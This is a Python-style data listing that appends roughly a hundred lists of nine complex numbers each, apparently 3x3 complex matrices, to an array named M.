M.append([(102.634291155-0.509512502815j),(40.0868232579-71.4641566751j),(51.0257430858+7.11674774897j),(45.0350102486+13.2708867997j),(92.8413104617-42.8397238271j),(37.4041615395+18.3535731731j),(-66.8904305305+68.2288153015j),(30.0850072999+127.061832581j),(-25.4756016165+49.3492363299j),]) M.append([(80.1750574994-34.5744257755j),(-33.3793019656+29.9784985257j),(-59.616663304-12.0461917812j),(-35.750959483-1.57402683457j),(108.366134272+35.39764586j),(-25.113092276+45.71786534j),(-27.7075754879-20.860338666j),(-17.391800654+26.2270234565j),(47.4588082287+5.17677991544j),]) M.append([(42.9328202615+15.1093299848j),(-19.4147501307-4.44005000613j),(68.5982109514-53.3281010505j),(-18.4163803774-23.988425907j),(94.0557132092-9.49839616598j),(44.1194018496+18.2364789856j),(9.41905132423+26.0821269903j),(0.291250745582-24.0162337219j),(94.0114665293+0.389066181134j),]) M.append([(141.972321478-22.1774071358j),(33.6026722573-30.8709828571j),(-5.09366104388-12.2689326492j),(-32.3207997431+14.6019900275j),(74.0613966047+20.4315905889j),(2.14502636709+13.6177038244j),(-14.8163591177+3.16385465201j),(-19.0335803996+4.64596826407j),(114.966281917+7.74581654687j),]) M.append([(111.75061067+2.4808125841j),(-1.49805457924+1.56693949512j),(-1.11835619147+3.14578120914j),(-0.0809587710247+1.78497909616j),(115.841738972+2.73811461484j),(0.0226242555715+1.14514077494j),(1.69922270079-2.6184756122j),(-0.368443760616-2.25017441683j),(113.407650359+0.781072801054j),]) M.append([(78.1206943968+29.9389829287j),(30.7241036237-25.5669046212j),(-26.4490460229-29.4593240352j),(25.4571832055+12.1512011702j),(70.4624560935-24.0759632059j),(-27.7181851774-26.4974024698j),(-18.4676546342-7.45888931756j),(-0.165542366106+26.5925178988j),(69.4168495098+0.136980277183j),]) M.append([(19.8020772319-0.440143220437j),(-9.86745817456+9.07480196311j),(-6.03330540754-18.4089420227j),(-7.91407657403+2.24224021425j),(15.7973004517-4.26653831973j),(5.26276204092+13.1545127906j),(-5.32558942199+3.60724303093j),(2.6185119581-7.07934921774j),(16.4006223164+10.7066815402j),]) M.append([(117.730590979+6.53661176027j),(-2.61330097178+5.39016192711j),(-7.14889464147+0.659519300699j),(-1.6354302199+12.5644741758j),(101.248088639+6.98693627457j),(-10.7662580613-7.13183119264j),(-6.97938554064+5.28100329273j),(-10.0574481899-3.9106451824j),(112.021320383-7.52354803484j),]) M.append([(111.575598913-1.71649563573j),(-3.847653662-3.46336035413j),(4.30382078558-1.14343049795j),(-1.84150370027+2.43684673265j),(112.89137557+4.55543172244j),(-2.11632821928-2.3771913486j),(1.44056149303-2.18966656167j),(1.24073982588-0.425583888783j),(116.533025516+3.16106391329j),]) M.append([(57.4488836175-3.63681193156j),(-12.7117200883-3.50789145641j),(9.48872442305+10.7422246443j),(-19.2433819737+26.8287523517j),(62.6543379737-4.11613701141j),(-25.9343926065-7.64588649511j),(11.2469413737+9.39910537747j),(-3.28655877365-12.0608054365j),(36.8967784089+13.752948943j),]) M.append([(102.168400769+1.73435801766j),(15.3513083768-16.2682518546j),(13.1345018327-14.2866683534j),(1.81353968489-0.0800500405803j),(94.6436809977-0.625132342111j),(1.93809457677-3.12685121188j),(0.247753677152+3.35758630833j),(6.69451732611+2.96588710518j),(97.1879182333+4.89077432445j),]) M.append([(101.521244757-18.7572743502j),(-6.06429909342-42.5796759561j),(1.29545209842-29.5039084754j),(-38.8062752111+8.12358761256j),(12.7240805412+24.747574696j),(-5.07532855482+16.5422410771j),(4.30831587163+11.6090663843j),(13.5251993497-16.2013946694j),(39.7546747017+0.00969965428976j),]) M.append([(109.080294844-6.2586154754j),(-9.46294053496+0.118944602315j),(0.403605863789-14.9590005925j),(-11.1617906738+5.75328777034j),(115.975345782+12.250962535j),(-16.7672148268-4.517133169j),(-4.9014310845+0.366945978164j),(-2.74027494835+4.77424803295j),(111.944359373+0.00765294037813j),]) M.append([(110.104014509+2.70695241711j),(0.727287836724+5.20199574092j),(-2.51995172883-0.954090613032j),(-5.84031636128-7.9919609229j),(108.866029714+1.90171578521j),(-5.04675489104-1.00743465803j),(-4.00058269827-9.00711166917j),(-0.725291954802-3.04101219436j),(106.029955777+1.39133179768j),]) M.append([(115.056163352+1.81701030543j),(-1.05007125813-0.690190356746j),(-0.0905709393424+0.17976251271j),(0.32048671172+0.0664962790541j),(113.825311548+3.00534538851j),(-0.422691613873+0.605960612628j),(0.336696776686+0.72201192056j),(1.56645891929-1.08293731044j),(116.1185251+1.17764430605j),]) M.append([(44.6019042988-0.496547395762j),(-0.260581925346+3.35369858862j),(-2.79258676425+7.49646731203j),(1.20551490453-10.3814172506j),(47.6823175988+3.86670819701j),(5.97226093591-5.80728906688j),(-4.27765514882-11.2119086519j),(6.96930593167+3.186383041j),(45.7157781025+2.62983919876j),]) M.append([(101.636272831+1.13801006605j),(-0.412822045625-0.180483584816j),(1.04139841901-0.920325293532j),(-0.865131241505-2.35772850094j),(100.404427538+2.74622150529j),(1.19426963882-0.921846088613j),(-1.34956861591+0.758318873808j),(0.618235100336+0.340208499527j),(100.959299632+2.11576842866j),]) M.append([(36.524012383-53.3493608729j),(-18.9817251495-55.8836905716j),(-48.4623160947-32.6498371735j),(109.366195052+92.5096445166j),(132.930558181+95.3062656964j),(78.3499701493+54.2568819244j),(-47.9393335289-61.4506895522j),(-6.00463730164-52.7951284281j),(66.5454294357-35.9569048235j),]) M.append([(111.267452491+3.51299259355j),(-0.88195946298-0.997183741448j),(-2.40655162389+2.781752304j),(5.00587792159+2.25768205845j),(115.956706465+3.08295351819j),(3.73345521204-0.302760238411j),(6.99792767198+0.280923476409j),(1.49991242704+1.51487219453j),(119.775841044-0.595946111742j),]) M.append([(98.9062267519+6.88008325217j),(-12.2341484275+10.9977673485j),(1.93865423133-10.7530278001j),(7.7571091844+0.488779278784j),(122.80476506-1.17515449207j),(-4.23646374927+8.84270150411j),(-1.00897906412+4.87000155599j),(1.38159497732+6.05820089367j),(107.289008188+0.295071239903j),]) M.append([(46.6619819337+37.6607121446j),(-61.1401032713-5.6635461056j),(90.2578555024-43.1413923526j),(-24.2429843305-20.6516266688j),(80.7848237861-40.3313555312j),(32.5121370144+64.0539076811j),(2.07864140676-0.65065569437j),(1.18587450401-6.61781267929j),(92.5531942802+8.67064338663j),]) M.append([(49.848039323+7.76355795218j),(7.14282439762-18.182214588j),(15.0507550449-1.85110876595j),(-28.2755476365-0.0254652566535j),(72.8925287902+11.8437780269j),(-13.6123477222+19.2683065715j),(42.8511314096+3.98548768282j),(-19.6634449632+0.308795990643j),(68.2594318868-13.6073359791j),]) M.append([(-40.6824820298+195.472044333j),(-146.40438628-27.1548651835j),(-53.4278845238-85.4325378594j),(-196.308579455-272.124922913j),(194.804000601-165.752616522j),(138.715396271+14.7350726278j),(5.1411671288+105.442078626j),(-70.9227971204+17.2546511451j),(-0.121518570808-23.7194278117j),]) M.append([(114.118704542+17.0648696127j),(-2.20894426775+0.471161008961j),(-9.97574862936-4.6060030284j),(-18.2388750523+5.51913622468j),(117.815452202+1.35464373613j),(-3.01299952698-13.3615218613j),(-24.505551984+14.2717854125j),(5.66490400366-4.25609492522j),(105.065843256-12.4195133488j),]) M.append([(104.979936524+2.13866104942j),(6.47467901021+1.38326578736j),(15.7890621797+3.55488596186j),(1.65196662098+5.93285219377j),(111.848213573-0.810521755714j),(-0.175213854319-7.73071285226j),(1.72663209288-2.59109711535j),(-1.79084919916-0.0293585072055j),(108.171849903+4.6718607063j),]) M.append([(115.70702304+2.25974669907j),(-0.119863138099-0.515187823892j),(-0.959551540979+0.210425853023j),(-0.393903920841-0.531482910776j),(115.423346645+1.51421614805j),(-0.254594312586-2.03926851064j),(-0.685976988094+0.424749458802j),(0.28003067492-0.525730215183j),(113.869630316+2.22603715289j),]) M.append([(56.687251109+10.2205097504j),(-1.04963763087-8.71000393465j),(-0.902610516747-9.95380477088j),(-12.7048428475-5.98680737511j),(43.2559138219+9.95558005122j),(4.23024305685+8.55924600042j),(22.3618351926+17.3966794093j),(0.530023775524-20.4965172256j),(38.0568350691-14.1760898016j),]) M.append([(31.7318316766+2.58478820469j),(0.0669603189332+0.341531044884j),(0.258932441122+0.772319029242j),(0.472428123842-0.387751726368j),(32.2156093271+1.28109681632j),(-0.144529376746-1.02593075862j),(0.140173797982+0.464765927091j),(0.119012830567-0.435116522554j),(32.0525589964+2.13411497899j),]) M.append([(30.1531011263+201.621480111j),(-130.236532086-13.3687584577j),(-41.8601687987-159.158183441j),(-174.714157119-95.1940044521j),(138.616901199-115.855166608j),(149.037614933-24.5558890293j),(-44.7875377292+102.869790101j),(-67.0064723994-7.3448398233j),(94.2299976745-79.7663135031j),]) M.append([(77.8985408664-10.7689980959j),(-6.85637824338-21.4097416176j),(-6.75762828183+10.2851326531j),(-4.44958429019+36.7639414271j),(88.0440086387-6.20136836795j),(-17.7416927887-28.996888267j),(11.1859367359-0.221118120326j),(-26.8061541974+5.80833966513j),(48.0574504949+22.9703664638j),]) M.append([(107.936665881+72.7278000784j),(39.3515780507-74.8516423643j),(-52.7260989317-54.7792535031j),(27.0696560914+52.8005603519j),(105.88995865-58.9642807995j),(-52.0018325988-26.2029397851j),(46.082045596+42.8815611167j),(-10.3073744386-69.6388312922j),(27.1733754682-7.76351927881j),]) M.append([(73.8312959005+35.1548075935j),(-4.51946579997-63.6220159832j),(-71.8787087607+26.6219699298j),(-1.13009265339+43.1266852842j),(67.2756545726-18.5995414604j),(-51.6284520602-29.9588625707j),(0.734420696915+22.7522822397j),(0.846484087069-15.8456609823j),(3.89304952688-10.5552661331j),]) M.append([(109.389555492+9.1355788506j),(8.28463557676+0.1127746957j),(7.29010890848-0.455041770878j),(2.15868140278-6.80308800371j),(113.558268939+1.65485433314j),(-3.09466443195+3.58268890889j),(10.9516150769+4.77028180237j),(0.844304147653-12.0854373431j),(114.052175568-4.79043318374j),]) M.append([(115.69467097+2.98720684062j),(-0.413306537407-1.63283255779j),(3.02148765607+1.22424978137j),(0.0917095606052+2.45844333371j),(112.576152026+0.141134894002j),(3.80775743774+0.408892955104j),(-2.73772429291+0.16936346286j),(1.86385615966+0.728763850075j),(110.729177003+2.87165826537j),]) M.append([(78.4800083508-24.4295782125j),(-28.0201692858-76.9906077568j),(36.8758826972+18.4756288622j),(-2.57974630666+23.1665103256j),(88.2861426619+33.4066424464j),(-0.0833173294919-19.2592785095j),(8.50556589698+4.70885157769j),(6.3247905459+15.7186505244j),(106.233848987-2.97706423384j),]) M.append([(-49.3945905339+93.8390309707j),(-60.41366299-41.3978910816j),(-26.8429046415+207.65475059j),(3.93450070319+149.700124978j),(-52.0835212339+18.7626535959j),(152.482407928+201.550058066j),(132.739659596+13.6453267668j),(2.61006058199+76.5762536521j),(228.478111768-106.601684567j),]) M.append([(32.2251416797+1.85773436946j),(0.0464929223963+0.593168166638j),(-0.0849895698837+0.788677769259j),(-0.481649831835+0.436075889408j),(31.8380695647+1.6738952763j),(-0.332533311979-0.645225535892j),(0.58054733751+0.613731403378j),(0.194444438331+0.0180092419662j),(31.9367887556+2.46837035424j),]) M.append([(124.218022322-37.232736877j),(21.2436570281-56.0348245702j),(40.9793706875+25.1108529349j),(12.6261002243+0.657266842966j),(128.546094953+2.9016264185j),(-3.36588525284+14.233609576j),(39.4676872421+23.3103061859j),(55.759136459+36.3813881409j),(74.2358827253+40.3311104585j),]) M.append([(92.8823716871-45.3992723858j),(-123.04218142+59.8542192854j),(71.1647740829+94.555030913j),(16.2244114791-73.3858673208j),(-22.7733479897+125.581289901j),(115.407520098+25.9141499525j),(-49.6199160385-39.4237394643j),(72.1985506855+85.950308838j),(92.8909763026-74.1820175155j),]) M.append([(62.1606237587+5.74075170918j),(-53.281006745-18.3861886988j),(36.6927115936-23.5175367205j),(-2.19098397046+8.73089395746j),(95.9903247819+12.3396748039j),(-4.28791556192-15.5621693948j),(12.3977030223+22.5276907901j),(1.40368523667+31.5516765088j),(88.8490514593-12.080426513j),]) M.append([(98.3632581008+2.60079969707j),(-11.9489955666+9.32950021905j),(10.3080280976+3.37729647639j),(-1.09048762116+4.55361350087j),(115.962170791+4.54194960919j),(-0.283521137636-5.87502517869j),(5.11634446762+5.91721106843j),(6.11973549406+1.2378406594j),(106.674571108-1.14274930626j),]) M.append([(2.18394934776-11.1875396364j),(11.9607250363+69.3274647111j),(-90.5623764507-23.1550970306j),(53.9641272605-29.8303215235j),(71.295713172-27.6542330667j),(53.211992571-21.6666364414j),(79.1816474+36.2415389281j),(9.78136395423-61.6828790907j),(170.52033748+44.8417727031j),]) M.append([(105.10489508-2.1460685983j),(4.16582631665-0.196815439559j),(1.82613870078+6.02880956088j),(4.87493006397+3.01586124754j),(104.03877314+2.68655370041j),(-2.94914546106-6.22276293218j),(0.277501754551-0.335085509681j),(3.26609150953+2.05035263636j),(109.85633178+5.45951489788j),]) M.append([(65.5252240967+8.91868834016j),(-18.8423134159-6.00772087187j),(-9.73285312621+21.1814626125j),(31.3221083963+9.79929465216j),(15.7052195704-5.0568714487j),(-12.3569281953+28.7121355493j),(-4.83364944322-40.1199943728j),(3.89819059221+30.6981554979j),(76.7695563328+2.13818310854j),]) M.append([(12.8740629226-17.6791149569j),(38.3868270497+50.1162447238j),(-49.8794380735+26.3627146679j),(-79.6156989651-18.7146668479j),(135.35931948+74.635798041j),(-84.2876663353+56.5997074998j),(30.5672688446-37.1432632472j),(-57.182655207+23.4478790773j),(42.7666175976-50.9566830841j),]) M.append([(147.529393903-37.03752067j),(-49.3747943554-15.2504952995j),(-73.6737507851+0.269116899624j),(101.970524098-64.0226605658j),(-36.1887601231+5.18518348547j),(-77.4510261116+34.6819080898j),(-37.1148498419-61.3582120046j),(2.81955413576+25.4261574139j),(42.6593662202+37.8523371845j),]) M.append([(114.897245396+1.30604601552j),(-2.69039218068-3.81142903464j),(-1.32669355226+2.66509624987j),(-1.18067273262+8.94467189865j),(106.373978524+8.12529788996j),(9.96351610813+10.0163747501j),(5.42695618635-1.7769597795j),(7.30461765617+0.130664031963j),(115.72877608-3.43134390549j),]) M.append([(109.565834363+2.84439395911j),(0.977921954605-1.13476692159j),(-1.21504573537-1.16128443891j),(-2.63784942301+2.709996206j),(114.666157925+0.505021747354j),(-0.619143333106+0.121422312843j),(-8.48398346394-11.5777919169j),(0.550586481933+11.760809134j),(100.768007711+2.65058429353j),]) M.append([(115.692998769+1.78143531257j),(0.550067247602+0.685993297091j),(0.356335013766+0.19379297444j),(-1.80206944779-0.245405610962j),(114.401060305+2.46198685389j),(0.146151614643-0.286088224558j),(2.86953492005+2.41713405686j),(1.78394608407-0.893392966187j),(114.905940927+1.75657783354j),]) M.append([(47.3170586051+4.96103658612j),(-3.66439325894+5.65737881642j),(4.83298197462-6.81809852169j),(4.8097816661-0.780785168592j),(36.177294741+0.47543086442j),(-1.82340993426+5.24909481502j),(3.38923484216+11.4830588733j),(-14.92317908-0.117841968269j),(54.5056466539+0.563532549465j),]) M.append([(32.8460985087+3.30144577319j),(0.520778030986+0.143707035249j),(0.48817647304-0.608900436332j),(0.181393466471-1.35093734963j),(31.5833305782+1.02480831976j),(-0.416124791571-0.0822859173549j),(1.32208456247-1.28607096931j),(0.510587494511-1.21296717801j),(31.5705709131+1.67374590705j),]) M.append([(32.5842135622+2.60099834508j),(-0.35269227065+0.00619733642251j),(0.22792103693+2.31881092633j),(-0.369033490445-0.546559013941j),(32.3395848546+2.29419435359j),(1.42968363077-2.38582758702j),(-0.456857666331+0.476108582866j),(0.167790807913-0.0820473257769j),(31.0762015832+1.10480730133j),]) M.append([(112.94620406+11.0185081459j),(37.1290707346+13.2831942328j),(25.0483367133+16.6053114275j),(-1.55559520797-16.6000489366j),(68.1742973305-15.3300020942j),(-2.95824507694-9.69546065623j),(-3.22185042036+7.78381734227j),(-5.52456538277+11.3577315723j),(71.8794986097+10.3114939483j),]) M.append([(109.12813566-12.3249201754j),(32.4620564865-36.9419822522j),(-19.0876710606-19.0445903924j),(-10.0525062391+5.04507233989j),(68.621792809+13.7768103298j),(0.952093602097+19.1722259016j),(-4.69749357032-7.95204595137j),(-9.20934553762-29.5455695811j),(89.2500715312+4.5481098456j),]) M.append([(107.669450554-0.26227302222j),(-8.35367368033-6.98697446363j),(-2.18563185822+5.12204144901j),(-4.75847698995-0.280968907322j),(103.6839917+9.72547073106j),(3.77521260334-1.44324947549j),(-2.32778568041+3.42413345533j),(8.90252309571+1.85671163245j),(102.646557745-3.46319770884j),]) M.append([(117.973058347-13.3532235153j),(15.5986763443-12.5090787131j),(-9.14077452363+11.6374163122j),(-2.6707375404+7.66061614875j),(100.841625422+5.17901830091j),(4.4369177487-3.76887174305j),(0.565184926687-15.6184683325j),(9.10167552614-12.5373384026j),(104.185316231+14.1742052144j),]) M.append([(94.7696552089-0.199341379514j),(-11.0111046148-5.55611259422j),(-2.96755518714+13.4656247938j),(11.4369222371-3.6577307885j),(123.932372932+1.50896751563j),(-0.46379688833-10.0456976345j),(-2.59562140768-0.494252069729j),(-1.60713225165-0.842436353082j),(114.297971859+4.69037386388j),]) M.append([(79.3832041881-6.53091159194j),(-5.54952516363-47.5561253752j),(22.5025844644+28.1202503456j),(-2.73404182728+4.94551009692j),(72.2143041411+2.74911080791j),(7.46325441502-0.266373701014j),(5.84583399851-1.60148721482j),(26.0856532262+1.50420194385j),(56.4024916708+9.78180078403j),]) M.append([(77.462727781-25.8135670051j),(34.3472637463-1.58574646145j),(17.749521237-10.9164975847j),(34.2588938943+8.69689325163j),(71.1043955661+23.1758358854j),(-9.12703889253+21.4842286426j),(8.14213369754+9.33716735895j),(-14.2823314967-1.75157211606j),(84.4328766529+8.63773111974j),]) M.append([(89.1919717015+23.9091842535j),(-4.41349256552+1.83396545279j),(13.2182293409-11.6764998679j),(69.3372595158+9.0429831261j),(41.2779656473+22.7576860915j),(0.227167998061-34.4803800385j),(64.3907995934+17.441260627j),(-59.7569767896+32.1410407283j),(105.530062651-40.666870345j),]) M.append([(58.7006461569-6.52287453435j),(-14.2237646528-12.8571087435j),(-17.9760929537+1.59343817166j),(-85.1881823609+12.983452448j),(58.265457724-3.33328619362j),(-4.54742561999+7.245018135j),(-68.0094956262+57.7360857142j),(-45.9429982495+19.9083006391j),(114.033896119+15.856160728j),]) M.append([(112.717090438+3.9812375576j),(-3.3047765677-2.34806155163j),(1.1265293982-2.66984588307j),(-0.639377915084+3.52239974076j),(113.039854328+0.624762871988j),(1.44847435949-3.90586469223j),(6.73729207692+2.62747705142j),(-2.29341597196+6.9893419954j),(105.243055234+1.39399957041j),]) M.append([(114.371549228+4.24024594302j),(0.0100652492986-3.23933875921j),(-1.3211229521+2.56161358564j),(-1.23385527887+2.24359655605j),(114.56545446-0.591885274749j),(-0.604836311874+3.52381052906j),(-2.09855777698+0.0616109157129j),(2.24910782423-1.36658528936j),(112.062996312+2.35163933173j),]) M.append([(34.0063003804-5.74499264809j),(-9.32779579167-13.034059973j),(-11.0726867869+16.2305454245j),(-43.5831309004-166.327965534j),(88.7833732398-103.273074691j),(-140.356287577+31.5397224428j),(-140.085082272+47.1822453807j),(-90.0838377288-16.4877719864j),(95.2103263798+115.018067339j),]) M.append([(32.7316875884+1.63650550838j),(1.46628636963-0.152837076653j),(-1.66587993382-0.596461717393j),(-0.22868109781-0.774257104779j),(33.0140258572+1.94232157329j),(-1.88889465221+0.137180992725j),(-0.404928542512+0.434623970969j),(0.064964451042+0.110498490144j),(32.2542865544+2.42117291833j),]) M.append([(32.3842205754+1.94907372137j),(-0.421309504866-0.149105307992j),(0.23281497922+0.621011894949j),(0.635797940121-0.787991533563j),(31.9196831474+2.73722505976j),(1.07590751089+0.47404887922j),(-0.568098374904+0.261906686715j),(0.0252876558843-0.0809969674626j),(31.6960962772+1.31370121887j),]) M.append([(-128.013145546-513.301227787j),(360.993393565+833.793585986j),(-751.246540155+604.414598035j),(221.063614929+37.5251196479j),(-248.646461748-65.3483750023j),(-31.7072759359-381.676578359j),(-404.483135877+207.298527892j),(661.867383715-319.086326309j),(621.659607293+584.649602789j),]) M.append([(101.572708412+10.9854346961j),(36.9393723821-15.6336232585j),(-11.61844308+4.55684753366j),(25.7441970777+4.81478390714j),(59.9635808379-5.58501477343j),(1.16104442911+16.1783296163j),(-8.60035151513+23.034630555j),(14.3779380914-36.8095590614j),(89.4637107505+0.599580077314j),]) M.append([(-94.124844062-239.15299257j),(-38.9992178581-171.425933335j),(-209.274651364+513.837957563j),(16.4818520619-212.043399152j),(169.448288971-96.8886735238j),(-340.759950589+150.558621179j),(-187.736195942-57.8809369071j),(-78.1130812494-77.5569587706j),(171.676555091+342.041666094j),]) M.append([(47.5877402948+13.2609596064j),(-27.8215378728+35.193292543j),(-33.3696766676-2.84622615652j),(5.70077445165+9.30696046162j),(126.293696163+9.39574238154j),(0.953497829789+14.6066553451j),(-42.0695392971-13.6471660148j),(-44.8650111749+24.2233631175j),(69.1185635424-16.656701988j),]) M.append([(101.784188241+4.17259342862j),(-1.91598077001+0.216159592647j),(1.62770757012-1.09252307501j),(-3.85770770273-0.523692048103j),(102.990678217-2.14915099432j),(0.0109641809665+6.28325954127j),(-3.2954304428+4.06449369335j),(-4.62604538161-1.87411986345j),(109.225133543+3.9765575657j),]) M.append([(26.7587995783+61.9427537236j),(36.313806397+4.21299454778j),(49.5230310405+39.6952853987j),(-98.6651574502+64.0678048176j),(151.80771202+11.6893993611j),(59.0467724968+51.3155662129j),(112.371354831-17.9418143522j),(-37.7094373002-28.0685141485j),(70.4334884014-67.6321530847j),]) M.append([(81.5332110498+66.7862836779j),(54.3075338465+37.0663867754j),(42.8978974904+84.8763931582j),(37.6564641695-56.7427011729j),(65.2405777917-42.1874790274j),(-27.3954849449-86.9166548673j),(14.6187812162-7.12932312513j),(-3.45493269339-13.2075844177j),(112.226211159-18.5988046505j),]) M.append([(72.5136892278-2.60804718267j),(0.909335300324-1.54708627343j),(6.98095812361+1.9691523448j),(-2.8114679119+3.73270101485j),(74.7676699897-1.85408855105j),(-0.162212365036-4.19621147043j),(12.9860730253+26.2741843678j),(-11.4532674772-20.5455035886j),(37.7186407825+10.4621357337j),]) M.append([(50.7333810124+11.807546946j),(-4.19403878107-2.31804874039j),(-6.48417956667+2.59896581043j),(1.27276876086+13.8890709323j),(39.4946340798-2.75195760266j),(-6.15356148149-2.47531974254j),(-9.84417986911+4.01465191229j),(2.55404831401-3.81641444639j),(42.7719849079-3.05558934336j),]) M.append([(83.6539959816+12.609378485j),(-30.3242578782-1.23337499162j),(9.02658927056-12.4181734382j),(-15.0993775218-6.45755105182j),(73.5960230401-6.06559010065j),(7.57962747127+6.97666787565j),(-3.93843653891-0.0714370575276j),(-4.87803790864-27.6031883633j),(102.749980978-0.543788384357j),]) M.append([(72.4740823665-12.989231646j),(9.93516041189+5.84982867389j),(-18.0963816751-2.11398454304j),(51.9181566621+42.3259506826j),(24.4766567207+6.56274674675j),(0.517599149326-29.5027510311j),(-72.5442702465+20.6916355864j),(-1.15277668999+6.78881333235j),(48.0492609128+12.4264848992j),]) M.append([(107.428892397-6.5347243102j),(-6.56663964271-17.0075901223j),(0.341664071109+11.1970738332j),(6.16686747185+3.13137479397j),(123.354070357+7.94259644313j),(-0.0992736217031-3.60538180999j),(6.04635907964-5.98640346733j),(14.1794938265-4.19890820772j),(106.217037246+4.59212786707j),]) M.append([(114.593882292+4.17154954563j),(3.32879251255+0.110802225759j),(-5.24247358089+0.516576122038j),(4.38692436176+0.759157901351j),(114.938900646-2.34489120456j),(-1.88364985219+7.04192480258j),(2.18481392416+2.59348172265j),(2.74015892456-2.01711895333j),(109.467217063+4.17334165893j),]) M.append([(64.2022115697+59.503654888j),(-11.9405521576-13.6830928821j),(107.560441382-16.2649059733j),(-95.9408046935-116.249543051j),(144.780875208-17.1507531308j),(-3.19690450641+211.59802073j),(46.7763711596-2.98141835779j),(-0.56677523639+11.3831479128j),(64.0169132225-36.3529017572j),]) M.append([(30.5147955465+20.6715169813j),(-18.6687241394+20.0315108521j),(-19.7854916582+10.4006467491j),(3.25566877642-20.7497980806j),(56.0254635819-20.4800001216j),(23.6119925717-10.1025561137j),(5.30510898465-4.11581562455j),(9.7681180874+0.68140814574j),(40.4597408716+5.80848314027j),]) M.append([(32.0472552748+1.9618769009j),(-0.24626527105-0.0240839896105j),(-0.892921407062+0.281897914907j),(-0.271149992957-0.0713304387857j),(32.2496175224+1.93765730785j),(0.853356931858-0.805983487207j),(1.02892815481+0.0987778930613j),(-0.011299967166-0.220150634754j),(31.7031272028+2.10046579126j),]) M.append([(32.7448849491+2.04673778859j),(-0.213530460941+0.619531980965j),(0.776136877997-0.676474265196j),(-0.105135591626+0.411718867854j),(31.9891248246+1.63321380905j),(0.0974416445432+0.528750857601j),(-1.04807816033-0.335601437695j),(-0.233720036077+0.24855199534j),(31.2659902263+2.32004840236j),]) M.append([(95.6594734024-23.8832785941j),(17.5243564574-10.7058372923j),(-41.8843966798+32.234543416j),(67.9214408885+81.9570877063j),(59.0251769205+56.3387139095j),(83.4554832436-147.115419247j),(16.9911611235-5.09144242878j),(4.0397815977+12.4840414565j),(90.315349677-26.4554353153j),]) M.append([(-16.699140321-22.0942075048j),(-89.0452176319-62.9129818659j),(-29.9774151432-146.976336212j),(138.894650902+330.881745405j),(102.834900957+304.585439272j),(-293.894140158+296.410835615j),(-202.635637453-139.771258764j),(-107.7676359-176.78334471j),(169.864239364-276.491231767j),]) M.append([(1.80187519164-43.5205038677j),(1.31945041746-56.1278126757j),(48.4879815584-7.93543172169j),(42.613603143-6.09163526601j),(118.922840942+19.9826205639j),(-16.183833756+12.1836334728j),(-3.50196517978-77.0819146038j),(32.3486808004-16.0408366524j),(126.275283866+29.5378833037j),]) M.append([(-58.5805705749+117.117960287j),(-40.0060794824-84.2269639379j),(-108.758279236+158.667513069j),(-178.853874791+408.148922709j),(-78.999731501-111.709415401j),(-23.7774303483+444.160929305j),(262.649586278+104.551236718j),(-63.0021296589+113.309690705j),(380.580302076+0.591455113729j),]) M.append([(103.132562154+5.28834591362j),(-0.730350172786-0.00699717916018j),(-3.23884392219-1.17084423042j),(-5.07025594119+5.88360721604j),(101.020866421+3.85416641764j),(-3.16594575014-8.49003948931j),(-6.4951521942-3.30845651592j),(-1.57285462445-0.641180669711j),(109.846571425-3.14251233126j),]) M.append([(127.156556746+34.8451549016j),(-75.4881175417-7.71619263811j),(41.6214709065-26.2054812968j),(10.5001596529+41.3545825462j),(33.6176103878-34.4216051543j),(47.8445881393-7.70994909868j),(4.67340118967-12.9211247779j),(18.5597073897+16.7115121284j),(88.2258328666+5.57645025269j),]) M.append([(110.691957539-28.4266136595j),(-17.9564891727-6.3399085622j),(22.5912716626-14.6415305355j),(-9.74803896431-39.5525989997j),(83.8304627572-0.389934738395j),(24.8807106017-27.8814008667j),(1.7915944384+62.4401440932j),(35.3846150328+11.3169484424j),(64.4775797036+34.8165483979j),]) M.append([(90.9837751036-4.46318781039j),(-82.367499422-52.7593167954j),(-62.2858256504+73.4345659261j),(5.68867964249+0.934768156268j),(44.6502771528-29.9538137471j),(-27.8048860456+22.4084702601j),(6.87627816083-5.33543304647j),(-37.3698941819-16.5636121986j),(49.3659477436+40.4170015575j),]) M.append([(35.7279085576-6.91641130732j),(2.69447826006+8.50459978824j),(18.0303380704+28.7028948131j),(-36.2787726586-0.663823070639j),(53.6725062182+9.07116707798j),(-23.7293727349+23.6863259217j),(-2.40018127249+1.01788930448j),(8.83259709747+1.92950703448j),(101.599585224+3.84524422934j),]) M.append([(75.5382609129+14.7518975643j),(82.2489125562-11.5435974512j),(31.8750460962-53.079998837j),(35.9146556891-31.2309133815j),(47.4130422366-50.1231328328j),(-20.6740952931-43.4938838224j),(-19.7226334077+12.8679678357j),(-48.0172482039+18.214749399j),(31.0486968506+41.3712352685j),]) M.append([(97.1885263449+6.93143355639j),(19.9817440387+4.03195637506j),(23.1977275161-10.4680429131j),(-8.89387345704+15.5973177819j),(132.9757113-7.67675033751j),(10.5339628172-22.2768366416j),(9.29073947315-0.410119037375j),(-7.87071440925-2.73803592578j),(106.835762355+6.74531678112j),]) M.append([(107.642622089+1.74594497961j),(9.80263106386+9.4863655721j),(-17.9544808064-6.15405360668j),(0.354708156264-0.835569421372j),(118.525092422+5.83269292702j),(-15.0499115534-0.502832619831j),(-1.70736793115-2.09372076482j),(4.84256009608+6.98184767322j),(98.8322854883-1.57863790663j),]) M.append([(115.004315172+6.0961189503j),(3.88098865759-0.962009660486j),(1.524987913+0.986828388062j),(2.71332358081+1.728131842j),(116.620068966-0.404963606748j),(1.71092611984-0.610961995211j),(-0.0627613476753-3.45274132366j),(-3.06435411098-0.298114267443j),(113.375615862+0.308844656447j),]) M.append([(37.0985332169+2.59628704055j),(10.8851247658-4.79449766036j),(4.55719972859-0.574849065183j),(-0.521352634362-3.35113072728j),(49.9817024414+7.56396255281j),(10.2964922449-0.951235537044j),(-7.99450762087-8.3065994295j),(21.1192083792+8.91440999053j),(50.9197643417-4.16024959337j),]) M.append([(31.3033176425+1.79977545389j),(-0.131162800685+0.774147977465j),(-0.332876096447-0.163370663799j),(-0.0601854267936+1.29696347899j),(32.8009737729+1.75018761545j),(-0.0856547132312+0.156145824935j),(0.418208544808-1.41106874974j),(-0.24341286687+0.456940531704j),(31.8957085846+2.45003693066j),]) M.append([(33.2028169775+1.64961093618j),(0.986979715076+0.768599265057j),(-0.563880282676+0.938998551676j),(-0.0917104086281-0.409711274612j),(32.0369122933+1.74709978024j),(0.261776021275+0.381287381474j),(1.57000885507+0.817314547075j),(0.175809421437+2.18953323205j),(30.7602707293+2.60328928358j),]) 